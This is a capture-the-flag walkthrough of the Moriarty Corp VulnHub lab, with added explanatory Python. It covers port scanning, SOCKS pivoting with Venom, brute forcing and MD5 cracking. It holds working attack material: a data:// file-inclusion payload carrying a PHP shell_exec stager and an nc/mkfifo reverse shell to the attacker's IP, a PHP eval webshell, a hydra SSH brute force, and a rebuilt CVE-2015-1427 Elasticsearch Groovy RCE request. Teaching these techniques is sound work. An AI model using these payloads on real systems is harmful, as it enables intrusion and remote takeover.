Escape

Overview

Name: Template
Release Date: 2024-11-09
Write-up Author: kill3r
Machine Author: kill3r
Difficulty: Medium
User Flag:
Root Flag:
Link: https://www.vulnhub.com/entry/boredhackerblog-moriarty-corp,456/

Description

  • As an agent, help investigate the illegal dealings of the world's largest arms dealer!

  • The lab consists of 6 tasks; completing a task and submitting its flag unlocks the next one.

  • The web panel is on port 8000 (out of scope, do not attack it).

  • Flags are stored as #_flag.txt and entered in flag{} format. They are usually in / but may be elsewhere.

  • When you submit a flag, the web application starts a docker container in the background. Shutting down and restarting will break it.

Tasks involved:

  • Port scanning
  • Web app attacks and bug hunting
  • Pivoting (meterpreter strongly recommended)
  • Password guessing / brute forcing

Skills used

  1. File inclusion
  2. Tunnelling / proxying with venom or ew
  3. File upload
  4. Hash cracking
  5. Logic flaws

Nmap scan

ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.100 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
nmap -p$ports -sV -sC -O 192.168.56.100 -oN nmap.txt
# Line 1: scan all 65535 TCP ports of the target; --min-rate=1000 sends at least 1000 packets per second and -T4 selects the aggressive timing template.
# grep -oE '(^[0-9][^/tcp]*)' pulls the leading port number out of each "22/tcp open ssh" line (it matches any line that starts with a digit, up to the first /, t, c or p), and tr '\n' ',' joins the numbers into a comma-separated list.
# Line 2: rescan only those ports with service/version detection (-sV), the default NSE script set (-sC) and OS detection (-O), saving normal output to nmap.txt (-oN).
┌──(root㉿kill3r)-[/home/kill3r]
└─# ports=$(nmap -p- --min-rate=1000 -T4 192.168.56.100 | grep -oE '(^[0-9][^/tcp]*)' | tr '\n' ',')
┌──(root㉿kill3r)-[/home/kill3r]
└─# nmap -p$ports -sV -sC -O 192.168.56.100 -oN nmap.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 10:01 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.104
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:a7:c8:64:2a:54:bc:64:48:16:2b:79:64:69:cc:45 (RSA)
| 256 89:8d:6a:9b:44:e3:f1:f1:ef:8c:23:13:7a:84:fc:71 (ECDSA)
|_ 256 1d:e6:68:27:52:5b:6d:0d:67:5d:30:4c:03:68:b3:2a (ED25519)
8000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.15rc1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
9000/tcp open http Portainer Docker UI 1.19.2
|_http-title: Portainer
MAC Address: 08:00:27:C8:E8:21 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.56.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds
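The grep pattern in the pipeline above works because, in -p- output, the only lines that start with a digit are port lines. As an added example that is not part of the write-up, here is a parser that anchors on the full "port/proto state service" shape instead, so it cannot pick up other numeric lines, and produces the same -p list. The sample output is constructed to mirror the scan above.

```python
import re

# Constructed sample of `nmap -p-` normal output (not the page's own scan output).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 10:01 CST
Nmap scan report for 192.168.56.104
Host is up (0.00054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8000/tcp open  http
9000/tcp open  http
MAC Address: 08:00:27:C8:E8:21 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds
"""

# A port line always has the shape "<port>/<proto> <state> <service>"; anchoring on all
# three columns means banner, MAC and "Nmap done" lines can never slip into the list.
PORT_LINE = re.compile(r"^(\d{1,5})/(tcp|udp)\s+(\S+)\s+(\S+)", re.MULTILINE)


def parse_ports(nmap_output, states=("open",)):
    """Return (port, proto, state, service) tuples for port lines in the given states."""
    found = []
    for match in PORT_LINE.finditer(nmap_output):
        port, proto, state, service = match.groups()
        if state in states:
            found.append((int(port), proto, state, service))
    return found


def port_spec(nmap_output, states=("open",)):
    """Comma-joined port list in the form `nmap -p` expects, e.g. '22,8000,9000'."""
    return ",".join(str(port) for port, _, _, _ in parse_ports(nmap_output, states))


if __name__ == "__main__":
    print(port_spec(SAMPLE_NMAP_OUTPUT))
```

Unlike the grep/tr version, the list has no trailing comma, and filtered or open|filtered ports can be requested explicitly through the states argument.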

Enumeration

SMB enumeration

Ports: 139, 389, 445, 636

  • enum4linux -a/-A <ip>
$ enum4linux -A <ip>
  • MSF-SMB
# SMB version detection
msf6 > use auxiliary/scanner/smb/smb_version
# enumerate shares
msf6 > use auxiliary/scanner/smb/smb_enumshares
# enumerate users through SID lookup
msf6 > use auxiliary/scanner/smb/smb_lookupsid

Web

HTTP web servers, common ports: 80 443 81 8080 8443 4443 8081

  • Finger: obtain information about a particular user, or the user list and configuration details, on the system

whatweb

# Identifies the target site's technology stack (web server, CMS, plugins, frameworks) from its responses and page content
┌──(root㉿kill3r)-[~]
└─# whatweb 192.168.56.100
http://192.168.56.100 [200 OK] Apache[2.4.46], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.46 (Debian)], IP[192.168.56.100], Script[text/javascript]
  • Directory enumeration

dirb http://192.168.56.100

dirsearch -u http://192.168.56.100 -r

gobuster dir -w ... -u http://192.168.56.100 -x html,php,js,bak

┌──(root㉿kill3r)-[~]
└─# gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.56.100 -x html,php,js,bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.100
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,php,js,bak
[+] Timeout: 10s
===============================================================
2023/08/03 22:01:51 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 1620]
/profile.php (Status: 200) [Size: 1473]
/javascript.js (Status: 200) [Size: 0]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/exploit.html (Status: 200) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1099312 / 1102805 (99.68%)===============================================================
2023/08/03 22:03:22 Finished
===============================================================
  • Vulnerability scanning
$ nikto -h http://www.example.com/
$ nuclei -u https://example.com/

Walkthrough

Enter flag{start} on port 8000 to open the first level.

Level 1

Visit port 80.

The two pages differ only in the file name, which immediately suggests file inclusion. Start a listener on Kali: nc -lvvp 6666

# A data:// wrapper in the included-file parameter gives a reverse shell directly: the base64 blob decodes to <?php $var=shell_exec($_GET['cmd']);?> and cmd carries the nc reverse shell
data%3A//text/plain%3Bbase64%2CPD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7Pz4%3D&cmd=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f%7C/bin/sh+2>%261%7Cnc+192.168.56.102+6666+%3E/tmp/f
id
cd /
cat 1_flag.txt
flag{the_game_is_on}
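To see exactly what the include() above executes, and what the fix looks like, here is an added example (not code from the write-up or the lab). It decodes the page's data:// parameter, rebuilds it from PHP source, and shows the allowlist lookup that makes wrapper and traversal strings harmless. One caveat the page does not state: a data:// include only works when PHP's allow_url_include is enabled, so its presence is itself a misconfiguration finding. ALLOWED_PAGES is a hypothetical mapping.

```python
import base64
import urllib.parse

DATA_PREFIX = "data://text/plain;base64,"

# The value the write-up passes in the included-file parameter, copied from the page.
PAGE_PARAM = ("data%3A//text/plain%3Bbase64%2C"
              "PD9waHAgJHZhcj1zaGVsbF9leGVjKCRfR0VUWydjbWQnXSk7Pz4%3D")


def decode_data_wrapper(encoded_param):
    """Return the PHP source carried by a URL-encoded base64 data:// wrapper."""
    raw = urllib.parse.unquote(encoded_param)
    if not raw.startswith(DATA_PREFIX):
        raise ValueError("not a base64 data:// wrapper")
    return base64.b64decode(raw[len(DATA_PREFIX):]).decode()


def build_data_wrapper(php_source):
    """Inverse of decode_data_wrapper: wrap PHP source for a file-inclusion parameter.
    '/' is left unencoded, as in the page's payload; ':', ';', ',' and '=' are escaped."""
    blob = base64.b64encode(php_source.encode()).decode()
    return urllib.parse.quote(DATA_PREFIX + blob)


# Hardened side (hypothetical mapping): the page key is looked up in an allowlist, so no
# user-controlled string (data://, php://filter, http://, ../ traversal) reaches include().
ALLOWED_PAGES = {"index": "index.html", "profile": "profile.php"}


def resolve_include(page):
    """Return the file to include for an allowlisted page name, else None."""
    return ALLOWED_PAGES.get(page)


if __name__ == "__main__":
    print(decode_data_wrapper(PAGE_PARAM))
```

Run as a script it prints the one-line PHP stager hidden in the payload; the `&cmd=` part of the request is then just the argument that stager hands to shell_exec().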

Submit the first flag to unlock the next level.

Level 2

┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# ls
admin.exe admin_linux_x86 agent_arm_eabi5 agent_linux_x64 agent_macos_x64 changelog
admin_linux_x64 admin_macos_x64 agent.exe agent_linux_x86 agent_mipsel_version1 scripts

┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

# target
cd /tmp
wget http://192.168.56.102/agent_linux_x64
chmod +x agent_linux_x64


# attacker
┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# chmod +x admin_linux_x64

┌──(root㉿kill3r)-[/opt/proxy/Venom]
└─# ./admin_linux_x64 -lport 9999

# target
./agent_linux_x64 -rhost 192.168.56.102 -rport 9999
2023/09/09 08:43:12 [+]Successfully connects to a new node
(admin node) >>> show 
A
+ -- 1
(admin node) >>> (admin node) >>> goto 1
node 1
(node 1) >>> socks 9090
a socks5 proxy of the target node has started up on the local port 9090.

# point proxychains4 at the new SOCKS5 port
vim /etc/proxychains4.conf
socks5 127.0.0.1 9090

┌──(root㉿kill3r)-[/opt/lan]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p80
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 17:21 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.1:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.2:80 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.3:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.4:80 ... OK
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.7:80 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.10:80 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.13:80 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.16:80
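Each "Strict chain ... OK" or "socket error" line above is one SOCKS5 CONNECT exchange between proxychains and the Venom node: proxychains hooks connect() and asks the node to open each target port on its behalf. That is also why the scan needs -sT and -Pn: raw SYN probes and ICMP pings are not connect() calls and never reach the proxy. As an added example (not from the write-up or the Venom project), the exchange below is built and parsed byte for byte; ScriptedProxy is a constructed stand-in for the node, and the reply bytes are constructed.

```python
import ipaddress
import struct

SOCKS_VERSION = 0x05
NO_AUTH = 0x00
CMD_CONNECT = 0x01
ATYP_IPV4 = 0x01
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
    0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}


def greeting():
    """Client hello: version 5, one method offered, 'no authentication' (RFC 1928 s.3)."""
    return bytes([SOCKS_VERSION, 0x01, NO_AUTH])


def connect_request(host, port):
    """CONNECT request for an IPv4 target (RFC 1928 s.4): VER CMD RSV ATYP DST.ADDR DST.PORT."""
    return (bytes([SOCKS_VERSION, CMD_CONNECT, 0x00, ATYP_IPV4])
            + ipaddress.IPv4Address(host).packed + struct.pack("!H", port))


def parse_reply(data):
    """Interpret the proxy's reply to CONNECT; returns (ok, reason)."""
    if len(data) < 10 or data[0] != SOCKS_VERSION:
        return False, "malformed reply"
    code = data[1]
    return code == 0x00, REPLY_TEXT.get(code, "unknown reply code %d" % code)


def socks_connect(sock, host, port):
    """Run the two-step exchange on an already-connected socket-like object and report
    whether the proxy could open host:port. A port scan through proxychains is this
    exchange repeated per target, which is why only TCP connect (-sT) probes work."""
    sock.sendall(greeting())
    hello = sock.recv(2)
    if hello != bytes([SOCKS_VERSION, NO_AUTH]):
        return False, "proxy rejected no-auth method"
    sock.sendall(connect_request(host, port))
    return parse_reply(sock.recv(10))


def reply_for(code, host="0.0.0.0", port=0):
    """Build a server reply with the given REP code (BND.ADDR/BND.PORT are informational)."""
    return (bytes([SOCKS_VERSION, code, 0x00, ATYP_IPV4])
            + ipaddress.IPv4Address(host).packed + struct.pack("!H", port))


class ScriptedProxy:
    """Constructed stand-in for the Venom node: answers with a scripted list of replies."""

    def __init__(self, replies):
        self.replies = list(replies)
        self.sent = []

    def sendall(self, data):
        self.sent.append(bytes(data))

    def recv(self, _size):
        return self.replies.pop(0)


if __name__ == "__main__":
    node = ScriptedProxy([bytes([SOCKS_VERSION, NO_AUTH]), reply_for(0x00, "172.17.0.4", 80)])
    print(socks_connect(node, "172.17.0.4", 80))
```

A real node answers a closed port with REP 0x05 (connection refused) or simply times out, which is what proxychains prints as "socket error or timeout"; the scanner never sees the target's own TCP reset, so the proxy's reply code is the only state information it gets.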

172.17.0.4:80 is up. Open a browser through the proxy (proxychains4 firefox) and visit it.

It asks for a password, so brute-force it with Burp. Once the browser is pointed at Burp's listener it can no longer be given the SOCKS proxy, so instead configure Burp itself to forward traffic through the SOCKS5 port (its second-level proxy mode).

Use the form normally: pick a one-liner webshell, <?php @eval($_POST['a']);?>, as the file, type any password, turn interception on and submit.

Send the request to Intruder, mark the password as the payload position, choose a wordlist and start the attack.

Set the same proxy in AntSword (蚁剑) and connect to the webshell.

Flag obtained:

flag{picture_is_worth_1000_words}

Level 3 (hash cracking)

A list of accounts with hashed passwords turns up; the hashes look like MD5.

┌──(root㉿kill3r)-[/home/kill3r]
└─# hash-identifier 63a9f0ea7bb98050796b649e85481845
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

It identifies as MD5; an online lookup site returns the plaintexts (63a9f0ea7bb98050796b649e85481845 is the MD5 of root).

root
toor
password
admin
guest
MORIARTY
MCORP
mcorp
weapons
moriarty
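Online lookup sites work here because the hashes are plain, unsalted MD5: the same password always produces the same digest, so one table serves every account. As an added example (not from the write-up), the dictionary attack is done offline against the page's own wordlist and hash, next to the storage the application should have used, where a per-user salt and a slow KDF make the same table attack useless.

```python
import hashlib
import hmac
import os

# Wordlist and example hash taken from the write-up (the hash is md5("root")).
WORDLIST = ["root", "toor", "password", "admin", "guest",
            "MORIARTY", "MCORP", "mcorp", "weapons", "moriarty"]
PAGE_HASH = "63a9f0ea7bb98050796b649e85481845"


def looks_like_md5(digest):
    """Cheap sanity check before cracking or pasting into a lookup site: 32 hex chars."""
    return len(digest) == 32 and all(c in "0123456789abcdef" for c in digest.lower())


def crack_md5(targets, wordlist):
    """Unsalted MD5 dictionary attack: hash each candidate once, then look every
    target up in O(1). Returns {hash: plaintext} for the ones recovered."""
    table = {hashlib.md5(word.encode()).hexdigest(): word for word in wordlist}
    return {h: table[h.lower()] for h in targets if h.lower() in table}


# What the application should have stored instead: a random per-user salt and a slow KDF,
# so equal passwords give different digests and each guess costs 200k iterations.
def hash_password(password, salt=None, iterations=200_000):
    """Return (salt, hex digest) using PBKDF2-HMAC-SHA256; salt is random unless supplied."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest.hex()


def verify_password(password, salt, stored_hex, iterations=200_000):
    """Constant-time comparison against the stored digest."""
    _, digest = hash_password(password, salt, iterations)
    return hmac.compare_digest(digest, stored_hex)


if __name__ == "__main__":
    print(crack_md5([PAGE_HASH], WORDLIST))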

Write the usernames and passwords to separate files, find the hosts with port 22 open, and brute-force them with hydra.

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p22
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 19:05 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.1:22 ... OK
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.2:22 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.3:22 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.4:22 <--socket error or timeout!
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.5:22 ... OK

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 hydra -L admin -P password 172.17.0.5 ssh
[22][ssh] host: 172.17.0.5   login: root   password: weapons
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 ssh root@172.17.0.5
flag{what_weapons}

Level 4

The credentials are handed to us, and the hint says the service is probably on one of a few ports, so scan just those.

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p443,8000,8080,8888

The scan takes forever but eventually finishes.

Enter the credentials.

It looks like a chat room, with chat and change-password functions.

There is a user named admin. Check the change-password function to see whether it lets you change any user's password.

Guessing there is no authorization check, change the username field to admin. It seems to work; log in from a private window.

Login succeeds and the flag is right there.

flag{on_the_move}
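The level-4 bug is a missing authorization check: the handler verifies that someone is logged in, then trusts the username posted in the form. As an added example (not the lab's code; ChatApp, its accounts and session tokens are constructed), the vulnerable handler sits beside the fixed one, which takes the account to modify from the server-side session and rejects a form that names anyone else.

```python
class ChatApp:
    """Minimal model of the chat room's accounts and sessions (constructed, not the lab's code)."""

    def __init__(self):
        self.users = {"admin": "admin-original", "agent": "agent-original"}
        self.sessions = {"tok-agent": "agent"}   # session token -> logged-in user

    def login(self, username, password):
        return self.users.get(username) == password

    def change_password_vulnerable(self, token, form):
        """Pattern from the write-up: checks that *someone* is logged in, then acts on
        whatever 'username' the client posted, so any user can reset admin."""
        if token not in self.sessions:
            return False
        target = form.get("username")
        if target not in self.users:
            return False
        self.users[target] = form["new_password"]
        return True

    def change_password_fixed(self, token, form):
        """The account to modify comes from the server-side session, never from the form;
        a posted username that disagrees with the session is rejected outright."""
        actor = self.sessions.get(token)
        if actor is None:
            return False
        if form.get("username", actor) != actor:
            return False
        self.users[actor] = form["new_password"]
        return True


if __name__ == "__main__":
    app = ChatApp()
    app.change_password_vulnerable("tok-agent", {"username": "admin", "new_password": "pwned"})
    print("admin login with attacker's password:", app.login("admin", "pwned"))
```

Requiring the current password in the form would add defence in depth, but on its own it does not fix the bug: the root cause is that the target account is client-controlled.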

Level 5

The hint says there is an Elasticsearch instance.

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 nmap 172.17.0.0/24 -sV -sT -Pn -p9200
# Elasticsearch 1.4.2 on 172.17.0.7:9200; look for public exploits
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# searchsploit elasticsearch
-------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path
-------------------------------------------------------------------------------------------------------- ---------------------------------
ElasticSearch - Remote Code Execution | linux/remote/36337.py
ElasticSearch - Remote Code Execution | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit) | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit) | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump | multiple/webapps/50152.py
-------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results
Papers: No Results

# try the RCE first
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# searchsploit elasticsearch -m 36337.py
[!] Could not find EDB-ID #


Exploit: ElasticSearch - Remote Code Execution
URL: https://www.exploit-db.com/exploits/36337
Path: /usr/share/exploitdb/exploits/linux/remote/36337.py
Codes: CVE-2015-1427, OSVDB-118239
Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /opt/vulnhub/MoriartyCorp/36337.py

┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# python2 36337.py

▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██░ ██ ▓█████ ██▓ ██▓
▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒
▒███ ▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒ ▓██░ ▒░▒██▒▒▓█ ▄ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░
▒▓█ ▄ ▒██░ ░██▄▄▄▄██ ▒ ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░
░▒████▒░██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░░ ▒░ ░░ ▒░▓ ░▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░
░ ░ ░░ ░ ▒ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ░ ░ ▒ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░
░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░

Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
Use: 36337.py target


# the script takes only the target IP
┌──(root㉿kill3r)-[/opt/vulnhub/MoriartyCorp]
└─# proxychains4 python2 36337.py 172.17.0.7
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16

▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██░ ██ ▓█████ ██▓ ██▓
▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒
▒███ ▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒ ▓██░ ▒░▒██▒▒▓█ ▄ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░
▒▓█ ▄ ▒██░ ░██▄▄▄▄██ ▒ ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░
░▒████▒░██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░░ ▒░ ░░ ▒░▓ ░▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░
░ ░ ░░ ░ ▒ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ░ ░ ▒ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░
░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░

Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ ls
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.7:9200 ... OK
6_flag.txt
bin
boot
buyers.txt
dev
elasticsearch
elasticsearch-1.4.2.tar.gz
etc
home
lib
lib64
main.sh
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
~$ cat 6_flag.txt
[proxychains] Strict chain ... 127.0.0.1:9090 ... 172.17.0.7:9200 ... OK
flag{game_over}
~$
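What 36337.py sends for each command is a single search request whose script_fields entry runs Groovy on the node (CVE-2015-1427); the command output comes back as a field of the first hit. As an added example, not the write-up's code and not the exploit's source, the request body is rebuilt in that shape (the exact Groovy string is reconstructed from memory and is an assumption), the response is parsed, and a defender-side check flags such bodies. The response text is constructed. A caveat the page does not state: size:1 means the script is evaluated against one hit, so the index must already hold at least one document for the output to appear.

```python
import json

# Script in the shape the public CVE-2015-1427 exploit uses: reach java.lang.Runtime through
# Class.forName rather than by name, which the 1.4.2 Groovy sandbox's class blacklist misses.
# Reconstructed from memory; treat the exact string as an assumption.
GROOVY_TEMPLATE = ('java.lang.Math.class.forName("java.lang.Runtime")'
                   '.getRuntime().exec("{cmd}").getText()')
FIELD = "out"


def groovy_rce_body(cmd):
    """Search body for POST /_search. size:1 makes the script run against one hit, so the
    index must contain a document; cmd is inserted unescaped, as the exploit does."""
    script = GROOVY_TEMPLATE.format(cmd=cmd)
    return json.dumps({"size": 1, "script_fields": {FIELD: {"lang": "groovy", "script": script}}})


def extract_output(response_text):
    """Command output comes back as the script field of the first hit, or None if absent."""
    doc = json.loads(response_text)
    try:
        return doc["hits"]["hits"][0]["fields"][FIELD][0]
    except (KeyError, IndexError, TypeError):
        return None


# Defender side: any script_fields entry whose script touches process-spawning APIs.
MARKERS = ("Runtime", "forName", "ProcessBuilder", ".exec(")


def is_suspicious_search(body_text):
    """Return True when a _search body carries a script that can spawn a process."""
    try:
        doc = json.loads(body_text)
    except ValueError:
        return False
    fields = doc.get("script_fields", {}) if isinstance(doc, dict) else {}
    for spec in fields.values():
        script = spec.get("script", "") if isinstance(spec, dict) else ""
        if any(marker in script for marker in MARKERS):
            return True
    return False


# Constructed response standing in for what the target returned to `id`.
SAMPLE_RESPONSE = json.dumps({"took": 3, "hits": {"total": 1, "hits": [
    {"_index": "test", "_id": "1", "fields": {FIELD: ["uid=0(root) gid=0(root)\n"]}}]}})


if __name__ == "__main__":
    print(groovy_rce_body("id"))
    print(extract_output(SAMPLE_RESPONSE))
```

The marker check is deliberately crude; on a node that must allow dynamic scripting it is a detection signal, not a fix. The fix for this version is to upgrade (or set script.groovy.sandbox.enabled to false and keep 9200 off any network an attacker can reach through a pivot like the one used above).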

Done